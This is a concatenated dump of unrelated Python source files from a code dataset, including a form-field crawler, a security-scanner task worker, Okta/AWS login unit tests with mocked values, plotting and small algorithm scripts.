################################################################################################################################################\n\nurlList = read_csv('targetUrl.csv')\ntagDic = {'url': 'inputtagList'}\ninputTagNameList = list()\n\nfor i in range(len(urlList)):\n with open('./html/'+str(i)+'.txt', 'r', encoding='utf8') as html:\n soup2 = BeautifulSoup(html, 'html.parser')\n formList = soup2.find_all('form')\n for form in formList:\n inputTagNameList = list()\n inputTagList = form.find_all('input')\n for inputTag in inputTagList:\n inputTagNameList.append(inputTag.get('name'))\n tagDic[urlList['url'][i]] = inputTagNameList\n\nprint(len(urlList['url']))\nprint(len(tagDic))\n\nw_count = {'url': 'count'}\n\nfor url in urlList['url']:\n try:\n w_count[url] += 1\n except:\n w_count[url] = 1\n\nprint(w_count)\n","sub_path":"Python_crawling2/Python_crawing5.py","file_name":"Python_crawing5.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"520590258","text":"# -*- coding: utf-8 -*-\n\n#python读取编码为utf-8无BOM格式\n\n\ntext=[]\nclient=[] #客服内容\ncustomer=[] #客户内容\n\nwith open(\"messages.txt\",encoding=\"utf-8\") as t:\n text_all=t.readlines()\n for index,i in enumerate(text_all):\n line=i.strip().encode('utf-8').decode('utf-8-sig')\n text.append(index)\n #if line.find(\"王\")==0: #find返回字符串所在索引\n\n\n\n\n\n\n\n\nprint(enumerate(text_all))\n\n","sub_path":"basics/text_extract.py","file_name":"text_extract.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"490019287","text":"from lileb.transformations.TransformationTree import TransformationTree\n\n\nclass IdentityTransformation(TransformationTree):\n def __init__(self, *args, **kwargs):\n super(IdentityTransformation, self).__init__(*args, **kwargs)\n\n def build_tree(self):\n self.tree.add_node(self._node_index[self.name], name=self.name)\n node_name = 'Id'\n self.leaf_nodes.add(self._node_index[node_name])\n self.tree.add_node(self._node_index[node_name], name=node_name)\n self.tree.add_edge(self._node_index[self.name],\n self._node_index[node_name],\n f=lambda x: x)\n self.depth = 1\n return self._node_index[self.name]\n","sub_path":"Lileb/lileb/transformations/IdentityTransformation.py","file_name":"IdentityTransformation.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"556856508","text":"ans=[]\r\nfor i in range(1,1000002):\r\n h=[0 for j in range(10)]\r\n n=i\r\n temp=n\r\n j=1\r\n while h.count(0):\r\n while n:\r\n h[n%10]=1\r\n n=n//10\r\n j=j+1\r\n n=temp*j\r\n ans.append(n-temp)\r\n#print (ans)\r\nt=int(input())\r\nfor i in range(t):\r\n n=int(input())\r\n if not n:\r\n print('Case #'+str(i+1)+': INSOMNIA')\r\n else:\r\n print('Case #'+str(i+1)+': '+str(ans[n-1]))","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_Agham_gcj1.py","file_name":"16_0_1_Agham_gcj1.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"419052546","text":"\n# ch.3 exercise 1\n# This program will calculate the volume and surface area of a sphere from its radius.\n\n\n\n\nimport math\n# I wanted to utilize the import math library. trail and error lead me to utilizing the math.pi\n\ndef main():\n\n rad = eval(input(\"Enter the radius: \"))\n # formulas I used to calculate the area and volume\n vol = ((4 // 3) * round(math.pi, 2) * rad ** 3)\n # V = 4/3 * pi * radius^3\n area = (4 * round(math.pi, 2) * rad ** 2)\n # A = 4 * pi * radius^2\n print(\"the volume of the sphere from its radius is\" , vol, \"while the area of a sphere from its radius is\", area)\n\nmain()\n\n\n","sub_path":"ComputingNumbers/area&vol.py","file_name":"area&vol.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"280938933","text":"import collections\n\nfrom logbook import (\n MailHandler as _MailHandler, NOTSET, Handler, StringFormatterHandlerMixin,\n Logger, LimitingHandlerMixin)\n\nchatlogbot_logger = Logger('chatlogbot')\ngimlibot_logger = Logger('gimlibot')\nbirthdaybot_logger = Logger('birthdaybot')\n\n\n# Taken from unreleased Logbook 1.0, need it for SMTP_SSL\nclass MailHandler(_MailHandler):\n def __init__(self, from_addr, recipients, subject=None,\n server_addr=None, credentials=None, secure=None,\n record_limit=None, record_delta=None, level=NOTSET,\n format_string=None, related_format_string=None,\n filter=None, bubble=False, starttls=True):\n\n Handler.__init__(self, level, filter, bubble)\n StringFormatterHandlerMixin.__init__(self, format_string)\n LimitingHandlerMixin.__init__(self, record_limit, record_delta)\n self.from_addr = from_addr\n self.recipients = recipients\n if subject is None:\n subject = self.default_subject\n self.subject = subject\n self.server_addr = server_addr\n self.credentials = credentials\n self.secure = secure\n if related_format_string is None:\n related_format_string = self.default_related_format_string\n self.related_format_string = related_format_string\n self.starttls = starttls\n\n def get_connection(self):\n \"\"\"Returns an SMTP connection. By default it reconnects for\n each sent mail.\n \"\"\"\n from smtplib import SMTP, SMTP_SSL, SMTP_PORT, SMTP_SSL_PORT\n if self.server_addr is None:\n host = '127.0.0.1'\n port = self.secure and SMTP_SSL_PORT or SMTP_PORT\n else:\n try:\n host, port = self.server_addr\n except ValueError:\n # If server_addr is a string, the tuple unpacking will raise\n # ValueError, and we can use the default port.\n host = self.server_addr\n port = self.secure and SMTP_SSL_PORT or SMTP_PORT\n\n # Previously, self.secure was passed as con.starttls(*self.secure). This\n # meant that starttls couldn't be used without a keyfile and certfile\n # unless an empty tuple was passed. See issue #94.\n #\n # The changes below allow passing:\n # - secure=True for secure connection without checking identity.\n # - dictionary with keys 'keyfile' and 'certfile'.\n # - tuple to be unpacked to variables keyfile and certfile.\n # - secure=() equivalent to secure=True for backwards compatibility.\n # - secure=False equivalent to secure=None to disable.\n if isinstance(self.secure, collections.Mapping):\n keyfile = self.secure.get('keyfile', None)\n certfile = self.secure.get('certfile', None)\n elif isinstance(self.secure, collections.Iterable):\n if len(self.secure) == 0:\n keyfile = certfile = None\n else:\n keyfile, certfile = self.secure\n else:\n keyfile = certfile = None\n\n # Allow starttls to be disabled by passing starttls=True.\n if not self.starttls and self.secure:\n con = SMTP_SSL(host, port, keyfile=keyfile, certfile=certfile)\n else:\n con = SMTP(host, port)\n\n if self.credentials is not None:\n secure = self.secure\n if self.starttls and secure is not None and secure is not False:\n con.ehlo()\n con.starttls(keyfile=keyfile, certfile=certfile)\n con.ehlo()\n\n # Allow credentials to be a tuple or dict.\n if isinstance(self.credentials, collections.Mapping):\n credentials_args = ()\n credentials_kwargs = self.credentials\n else:\n credentials_args = self.credentials\n credentials_kwargs = dict()\n\n con.login(*credentials_args, **credentials_kwargs)\n return con\n","sub_path":"telegrambots/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"586199017","text":"#!/bin/python3\n\n# from src.DataGenerator import MetaData, DataGenerator\nfrom src.architecture import DeepFakeDetector, DeefFakeDetectorTF\nfrom src.video2tfrecordCustom import TfRecordDecoder, Video2TFRecord\nimport json, math\nimport horovod.tensorflow.keras as hvd\nimport tensorflow as tf\nfrom tensorflow.keras import backend as K\n\nif __name__ == \"__main__\":\n\n FRAME_COUNT_PER_EXAMPLE = 60\n BATCH_SIZE = 8\n NUM_SETS_PER_VIDEO = 4\n\n inception_path = 'weights/InceptionV3_Non_Trainable.h5'\n\n with open('data/metadata.json') as f:\n data = json.load(f)\n\n numSteps = len(trainDataGenerator)\n\n hvd.init()\n\n config = tf.ConfigProto()\n config.gpu_options.visible_device_list = str(hvd.local_rank())\n K.set_session(tf.Session(config=config))\n\n epochs = int(math.ceil(numSteps / hvd.size()))\n\n opt = tf.keras.optimizers.Adadelta(1.0 * hvd.size())\n\n opt = hvd.DistributedOptimizer(opt)\n\n DF.compile(optimizer=opt)\n\n callbacks = [\n hvd.callbacks.BroadcastGlobalVariablesCallback(0),\n ]\n\n # Horovod: save checkpoints only on worker 0 to prevent other workers from corrupting them.\n if hvd.rank() == 0:\n callbacks.append(tf.keras.callbacks.ModelCheckpoint('./weights/checkpoint-{epoch}.h5'))\n\n # opt = tf.keras.optimizers.Adadelta(1.0)\n # DF.compile(optimizer=opt)\n # epochs = numSteps\n DF.model.fit_generator(trainDataGenerator, steps_per_epoch=epochs, epochs=1, verbose=1, use_multiprocessing=False, workers=1) #callbacks=callbacks)\n\n\n # train(train_data_generator=, val_data_generator=None, steps_per_epoch=epochs, callbacks=callbacks, use_multiprocessing=False)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"624544944","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\n\nimport time\n\nfrom celery import Celery\nfrom celery.app.control import Control\nfrom celery.utils.log import get_task_logger\nfrom celery.execute import send_task\nfrom celery.task.control import revoke\nfrom celery.exceptions import TaskRevokedError\nfrom pymongo import MongoClient\nimport requests\n\nfrom minion.backend.utils import backend_config\n\n\ncfg = backend_config()\ncelery = Celery('tasks', broker=cfg['celery']['broker'], backend=cfg['celery']['backend'])\nlogger = get_task_logger(__name__)\n\n\ndef get_scan(api_url, scan_id):\n r = requests.get(api_url + \"/scans/\" + scan_id)\n r.raise_for_status()\n j = r.json()\n return j['scan']\n\ndef queue_for_session(session, cfg):\n queue = 'plugin'\n if 'plugin_worker_queues' in cfg:\n weight = session['plugin']['weight']\n if weight in ('heavy', 'light'):\n queue = cfg['plugin_worker_queues'][weight]\n return queue\n\n@celery.task(ignore_result=True)\ndef scan(scan_id):\n\n #\n # See if the scan exists.\n #\n\n scan = get_scan(cfg['api']['url'], scan_id)\n if not scan:\n logger.error(\"Cannot load scan %s\" % scan_id)\n return\n\n #\n # Is the scan in the right state to be started?\n #\n\n if scan['state'] != 'QUEUED':\n logger.error(\"Scan %s has invalid state. Expected QUEUED but got %s\" % (scan_id, scan['state']))\n return\n\n #\n # Move the scan to the STARTED state\n #\n\n scan['state'] = 'STARTED'\n #scans.update({\"id\": scan_id}, {\"$set\": {\"state\": \"STARTED\", \"started\": datetime.datetime.utcnow()}})\n send_task(\"minion.backend.state_worker.scan_start\",\n [scan_id, time.time()],\n queue='state').get()\n \n #\n # Run each plugin session\n #\n\n for session in scan['sessions']:\n\n #\n # Mark the session as QUEUED\n #\n\n session['state'] = 'QUEUED'\n #scans.update({\"id\": scan['id'], \"sessions.id\": session['id']}, {\"$set\": {\"sessions.$.state\": \"QUEUED\", \"sessions.$.queued\": datetime.datetime.utcnow()}})\n send_task(\"minion.backend.state_worker.session_queue\",\n [scan['id'], session['id'], time.time()],\n queue='state').get()\n \n #\n # Execute the plugin. The plugin worker will set the session state and issues.\n #\n\n logger.info(\"Scan %s running plugin %s\" % (scan['id'], session['plugin']['class']))\n\n queue = queue_for_session(session, cfg)\n result = send_task(\"minion.backend.plugin_worker.run_plugin\",\n [scan_id, session['id']],\n queue=queue)\n \n #scans.update({\"id\": scan_id, \"sessions.id\": session['id']}, {\"$set\": {\"sessions.$._task\": result.id}})\n send_task(\"minion.backend.state_worker.session_set_task_id\",\n [scan_id, session['id'], result.id],\n queue='state').get()\n\n try:\n plugin_result = result.get()\n except TaskRevokedError as e:\n plugin_result = \"STOPPED\"\n\n session['state'] = plugin_result\n\n #\n # If the user stopped the workflow or if the plugin aborted then stop the whole scan\n #\n \n if plugin_result in ('ABORTED', 'STOPPED'):\n # Mark the scan as failed\n #scans.update({\"id\": scan_id}, {\"$set\": {\"state\": plugin_result, \"finished\": datetime.datetime.utcnow()}})\n send_task(\"minion.backend.state_worker.scan_finish\",\n [scan_id, plugin_result, time.time()],\n queue='state').get()\n # Mark all remaining sessions as cancelled\n for s in scan['sessions']:\n if s['state'] == 'CREATED':\n s['state'] = 'CANCELLED'\n #scans.update({\"id\": scan['id'], \"sessions.id\": s['id']}, {\"$set\": {\"sessions.$.state\": \"CANCELLED\", \"sessions.$.finished\": datetime.datetime.utcnow()}})\n send_task(\"minion.backend.state_worker.session_finish\",\n [scan['id'], s['id'], \"CANCELLED\", time.time()],\n queue='state').get()\n # We are done with this scan\n return\n \n #\n # Move the scan to the FINISHED state\n #\n\n scan['state'] = 'FINISHED'\n #scans.update({\"id\": scan_id}, {\"$set\": {\"state\": \"FINISHED\", \"finished\": datetime.datetime.utcnow()}})\n send_task(\"minion.backend.state_worker.scan_finish\",\n [scan_id, \"FINISHED\", time.time()],\n queue='state').get()\n","sub_path":"minion/backend/scan_worker.py","file_name":"scan_worker.py","file_ext":"py","file_size_in_byte":4723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"139449734","text":"from __future__ import unicode_literals\n\nimport logging\nimport sys\nimport unittest\n\nfrom aws_okta_keyman import aws, okta\nfrom aws_okta_keyman.keyman import Keyman\n\nif sys.version_info[0] < 3: # Python 2\n import mock\nelse:\n from unittest import mock\n\n\nclass KeymanTest(unittest.TestCase):\n\n def test_setup_logging(self):\n # Simple execution test - make sure that the logger code executes and\n # returns a root logger. No mocks used here, want to ensure that the\n # options passed to the logger are valid.\n ret = Keyman.setup_logging()\n self.assertEquals(type(ret), type(logging.getLogger()))\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_init_blank_args(self, _config_mock):\n keyman = Keyman([''])\n assert isinstance(keyman, Keyman)\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_init_use_debug(self, config_mock):\n config_mock().debug = True\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz', '-D'])\n log_level = logging.getLevelName(keyman.log.getEffectiveLevel())\n self.assertEqual('DEBUG', log_level)\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_init_bad_config(self, config_mock):\n config_mock().get_config.side_effect = ValueError\n with self.assertRaises(SystemExit):\n Keyman([])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_main(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.handle_appid_selection = mock.MagicMock()\n keyman.user_password = mock.MagicMock()\n keyman.user_password.return_value = 'foo'\n keyman.init_okta = mock.MagicMock()\n keyman.auth_okta = mock.MagicMock()\n keyman.aws_auth_loop = mock.MagicMock()\n\n keyman.main()\n\n assert keyman.handle_appid_selection.called\n assert keyman.user_password.called\n keyman.init_okta.assert_called_with('foo')\n assert keyman.auth_okta.called\n assert keyman.aws_auth_loop.called\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_main_keyboard_interrupt(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.handle_appid_selection = mock.MagicMock()\n keyman.user_password = mock.MagicMock()\n keyman.user_password.side_effect = KeyboardInterrupt\n\n with self.assertRaises(SystemExit):\n keyman.main()\n\n @mock.patch('aws_okta_keyman.keyman.input')\n def test_user_input(self, input_mock):\n input_mock.return_value = 'test'\n self.assertEqual('test', Keyman.user_input('input test'))\n\n @mock.patch('aws_okta_keyman.keyman.getpass')\n def test_user_password(self, pass_mock):\n pass_mock.getpass.return_value = 'test'\n self.assertEqual('test', Keyman.user_password())\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_selector_menu(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n stdout_mock = mock.Mock()\n sys.stdout = stdout_mock\n keyman.user_input = mock.MagicMock()\n keyman.user_input.return_value = 0\n stuff = [{'artist': 'Metallica'},\n {'artist': 'Soundgarden'}]\n ret = keyman.selector_menu(stuff, 'artist', 'Artist')\n self.assertEqual(ret, 0)\n stdout_mock.assert_has_calls([\n mock.call.write('[0] Artist: Metallica'),\n mock.call.write('\\n'),\n mock.call.write('[1] Artist: Soundgarden'),\n mock.call.write('\\n')\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_selector_menu_keep_asking_if_out_of_range(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n stdout_mock = mock.Mock()\n sys.stdout = stdout_mock\n keyman.user_input = mock.MagicMock()\n keyman.user_input.side_effect = [99, 98, 0]\n stuff = [{'artist': 'Metallica'},\n {'artist': 'Soundgarden'}]\n ret = keyman.selector_menu(stuff, 'artist', 'Artist')\n self.assertEqual(ret, 0)\n keyman.user_input.assert_has_calls([\n mock.call('Artist selection: '),\n mock.call('Artist selection: '),\n mock.call('Artist selection: ')\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_handle_appid_selection(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar'])\n keyman.config.accounts = [{'name': 'myAccount', 'appid': 'myID'}]\n keyman.config.appid = None\n keyman.selector_menu = mock.MagicMock(name='selector_menu')\n keyman.selector_menu.return_value = 0\n keyman.config.set_appid_from_account_id = mock.MagicMock()\n\n keyman.handle_appid_selection()\n\n keyman.selector_menu.assert_has_calls([\n mock.call(\n [{'name': 'myAccount', 'appid': 'myID'}],\n 'name', 'Account')\n ])\n keyman.config.set_appid_from_account_id.assert_has_calls([\n mock.call(0)\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_handle_appid_selection_when_appid_provided(self, config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n config_mock().appid = 'someid'\n self.assertEqual(keyman.handle_appid_selection(), None)\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n @mock.patch('aws_okta_keyman.keyman.okta_saml')\n def test_init_okta(self, okta_mock, _config_mock):\n okta_mock.OktaSaml = mock.MagicMock()\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.init_okta('troz')\n\n okta_mock.OktaSaml.assert_has_calls([\n mock.call(mock.ANY, mock.ANY, 'troz')\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n @mock.patch('aws_okta_keyman.keyman.okta_saml')\n def test_init_okta_with_oktapreview(self, okta_mock, _config_mock):\n okta_mock.OktaSaml = mock.MagicMock()\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.config.oktapreview = True\n keyman.init_okta('troz')\n\n okta_mock.OktaSaml.assert_has_calls([\n mock.call(mock.ANY, mock.ANY, 'troz', oktapreview=True)\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n @mock.patch('aws_okta_keyman.keyman.okta_saml')\n def test_init_okta_with_empty_input(self, okta_mock, _config_mock):\n okta_mock.EmptyInput = BaseException\n okta_mock.OktaSaml = mock.MagicMock()\n okta_mock.OktaSaml.side_effect = okta.EmptyInput\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n with self.assertRaises(SystemExit):\n keyman.init_okta('troz')\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_auth_okta(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.okta_client = mock.MagicMock()\n keyman.okta_client.auth.return_value = None\n\n ret = keyman.auth_okta()\n self.assertEqual(ret, None)\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_auth_okta_bad_password(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.okta_client = mock.MagicMock()\n keyman.okta_client.auth.side_effect = okta.InvalidPassword\n\n with self.assertRaises(SystemExit):\n keyman.auth_okta()\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_auth_okta_mfa(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.okta_client = mock.MagicMock()\n keyman.okta_client.auth.side_effect = okta.PasscodeRequired('a', 'b',\n 'c')\n keyman.okta_client.validate_mfa.return_value = True\n keyman.user_input = mock.MagicMock()\n keyman.user_input.return_value = '000000'\n\n keyman.auth_okta()\n\n keyman.okta_client.validate_mfa.assert_has_calls([\n mock.call('a', 'b', '000000'),\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_auth_okta_mfa_retry(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.okta_client = mock.MagicMock()\n keyman.okta_client.auth.side_effect = okta.PasscodeRequired('a', 'b',\n 'c')\n keyman.okta_client.validate_mfa.side_effect = [False, True]\n keyman.user_input = mock.MagicMock()\n keyman.user_input.return_value = '000000'\n\n keyman.auth_okta()\n\n keyman.okta_client.validate_mfa.assert_has_calls([\n mock.call('a', 'b', '000000'),\n mock.call('a', 'b', '000000'),\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_auth_okta_answer(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.okta_client = mock.MagicMock()\n factor = {'id': 'foo', 'profile': {'questionText': 'a'}}\n keyman.okta_client.auth.side_effect = okta.AnswerRequired(factor, 'b')\n keyman.okta_client.validate_answer.return_value = True\n keyman.user_input = mock.MagicMock()\n keyman.user_input.return_value = 'Someanswer'\n\n keyman.auth_okta()\n\n keyman.okta_client.validate_answer.assert_has_calls([\n mock.call('foo', 'b', 'Someanswer'),\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_auth_okta_answer_retry(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.okta_client = mock.MagicMock()\n factor = {'id': 'foo', 'profile': {'questionText': 'a'}}\n keyman.okta_client.auth.side_effect = okta.AnswerRequired(factor, 'b')\n keyman.okta_client.validate_answer.side_effect = [False, True]\n keyman.user_input = mock.MagicMock()\n keyman.user_input.return_value = 'Someanswer'\n\n keyman.auth_okta()\n\n keyman.okta_client.validate_answer.assert_has_calls([\n mock.call('foo', 'b', 'Someanswer'),\n mock.call('foo', 'b', 'Someanswer'),\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_auth_okta_unknown_error(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.okta_client = mock.MagicMock()\n keyman.okta_client.auth.side_effect = okta.UnknownError\n\n with self.assertRaises(SystemExit):\n keyman.auth_okta()\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_handle_multiple_roles(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.selector_menu = mock.MagicMock()\n keyman.selector_menu.return_value = 0\n roles = [{}, {}]\n mock_session = mock.MagicMock()\n mock_session.available_roles.return_value = roles\n\n ret = keyman.handle_multiple_roles(mock_session)\n\n self.assertEqual(ret, 0)\n\n keyman.selector_menu.assert_has_calls([\n mock.call([{}, {}], 'role', 'Role')\n ])\n mock_session.assert_has_calls([\n mock.call.available_roles(),\n mock.call.set_role(mock.ANY),\n mock.call.assume_role()\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n @mock.patch('aws_okta_keyman.keyman.aws')\n def test_start_session(self, aws_mock, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.okta_client = mock.MagicMock()\n keyman.okta_client.get_assertion.return_value = 'assertion'\n aws_mock.Session = mock.MagicMock()\n\n keyman.start_session()\n\n keyman.okta_client.assert_has_calls([\n mock.call.get_assertion(appid=mock.ANY, apptype='amazon_aws')\n ])\n aws_mock.assert_has_calls([\n mock.call.Session('assertion', profile=mock.ANY)\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_start_session_failure(self, _config_mock):\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.okta_client = mock.MagicMock()\n keyman.okta_client.get_assertion.side_effect = okta.UnknownError\n\n with self.assertRaises(SystemExit):\n keyman.start_session()\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_aws_auth_loop(self, config_mock):\n config_mock().reup = False\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.start_session = mock.MagicMock()\n\n keyman.aws_auth_loop()\n\n keyman.start_session.assert_has_calls([\n mock.call(),\n mock.call().assume_role()\n ])\n\n @mock.patch('aws_okta_keyman.keyman.Config')\n def test_aws_auth_loop_multirole(self, config_mock):\n config_mock().reup = False\n keyman = Keyman(['foo', '-o', 'foo', '-u', 'bar', '-a', 'baz'])\n keyman.start_session = mock.MagicMock()\n keyman.start_session().assume_role.side_effect = aws.MultipleRoles\n keyman.handle_multiple_roles = mock.MagicMock()\n\n keyman.aws_auth_loop()\n\n keyman.handle_multiple_roles.assert_has_calls([\n mock.call(mock.ANY)\n ])\n","sub_path":"aws_okta_keyman/test/keyman_test.py","file_name":"keyman_test.py","file_ext":"py","file_size_in_byte":13409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"115926523","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# See https://doc.qt.io/qt-5/qpainter.html#drawText\n\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QWidget\nfrom PyQt5.QtGui import QPainter\nfrom PyQt5.QtCore import Qt\n\nclass MyPaintWidget(QWidget):\n\n def __init__(self):\n super().__init__()\n\n # Set window background color\n self.setAutoFillBackground(True)\n\n palette = self.palette()\n palette.setColor(self.backgroundRole(), Qt.white)\n\n self.setPalette(palette)\n\n def paintEvent(self, event):\n qp = QPainter(self)\n\n font = qp.font()\n font.setPointSize(32)\n qp.setFont(font)\n\n size = self.size()\n qp.drawText(0, 0, size.width(), size.height(), Qt.AlignCenter, \"Hello\")\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n\n widget = MyPaintWidget()\n widget.show()\n\n # The mainloop of the application. The event handling starts from this point.\n # The exec_() method has an underscore. It is because the exec is a Python keyword. And thus, exec_() was used instead.\n exit_code = app.exec_()\n\n # The sys.exit() method ensures a clean exit.\n # The environment will be informed, how the application ended.\n sys.exit(exit_code)\n","sub_path":"python/pyqt/pyqt5/widget_QPainter_draw_text.py","file_name":"widget_QPainter_draw_text.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"375307457","text":"import pylab\nimport numpy as np\nfrom cvxopt import solvers, matrix\n\nfrom matplotlib import rc\n\nrc('font', family='serif', size='15')\nrc('axes', labelsize='large')\nrc('legend', numpoints=1)\n\nx = np.arange(-1, 1, 1e-4)\n\ndef plot_polys(x, ps, **kws):\n pys = [np.polyval(p, x) for p in ps]\n for py in pys:\n pylab.plot(x, py, **kws)\n\ndef find_closest(xs, ymins, ymaxs, d):\n \"\"\"Find the degree d polynomial minimizing max dist\"\"\"\n A = np.vstack([xs**(d-i) for i in range(d+1)])\n G = np.bmat([[A.T, -np.ones((len(xs), 1))],\n [-A.T, -np.ones((len(xs), 1))]])\n h = np.bmat([ymins, -ymaxs]).T\n c = np.bmat([np.zeros(d+1), [1]]).T\n ans = solvers.lp(matrix(c), matrix(G), matrix(h))\n sol = ans['x']\n p = sol[:-1]\n dist = sol[-1]\n return (np.array(p), dist)\n\ndef evaluate(x, ps, d, plot=True):\n pys = np.array([np.polyval(p, x) for p in ps])\n mins = np.min(pys, axis=0)\n maxs = np.max(pys, axis=0)\n sigma = np.max(maxs-mins)/2\n pmin, dist = find_closest(x, mins, maxs, d)\n eval = np.polyval(pmin, x)\n real_dist = max(np.max(np.abs(py - eval)) for py in pys)\n if plot:\n plot_polys(x, ps, lw=1, color=\"red\", label=\"Quadratics within $2\\sigma$ of each other for all $x$\")\n real_dist *= 0.999\n pylab.fill_between(x, maxs - real_dist, mins + real_dist, alpha=0.3, label=\"Region within 1.09$\\\\sigma$ of all three possible $p$\")\n plot_polys(x, [pmin], lw=3, label=\"Does not fully include any quadratics\")\n return (real_dist / sigma)\n\npylab.clf()\nz = (6 - 4*2**.5)\nps = np.array([[1, -z, z-1], [1, z, z-1], [0, 0, 0]])\nps[:, 0] -= 1\nps[:, -1] += 1\nps /= np.max(np.sum(ps, axis=1))\nps *= 2\nevaluate(x, ps, 2)\n\nax = pylab.gca()\nbox = ax.get_position()\nax.set_position([box.x0, box.y0 + box.height * 0.3,\n box.width, box.height * 0.7])\n\nhandles, labels = pylab.gca().get_legend_handles_labels()\nnewLabels, newHandles = [], []\nfor handle, label in zip(handles, labels):\n if label not in newLabels:\n newLabels.append(label)\n newHandles.append(handle)\n\nnewLabels[-2:] = newLabels[:-3:-1]\nnewHandles[-2:] = newHandles[:-3:-1]\npylab.legend(newHandles, newLabels, loc='upper center', bbox_to_anchor=(0.5, -0.15),\n fancybox=True, shadow=False, ncol=1)\npylab.title(\"Lower bound instance: $d = 2$\")\npylab.xlim(-1, 1)\npylab.ylim(0, 3)\npylab.savefig(\"lowerbound.pdf\")\n","sub_path":"plot_lowerbound.py","file_name":"plot_lowerbound.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"83044942","text":"# 이원 탐색 : 정렬된 리스트에서 key 값 찾기\n## 입력값 : 리스트, key\n\ndef BinarySearch(list, key):\n left = 0\n right = len(list) - 1\n\n while(left <= right):\n middle = int((left + right) / 2)\n\n if key < list[middle]:\n right = middle - 1\n elif key > list[middle]:\n left = middle + 1\n elif key == 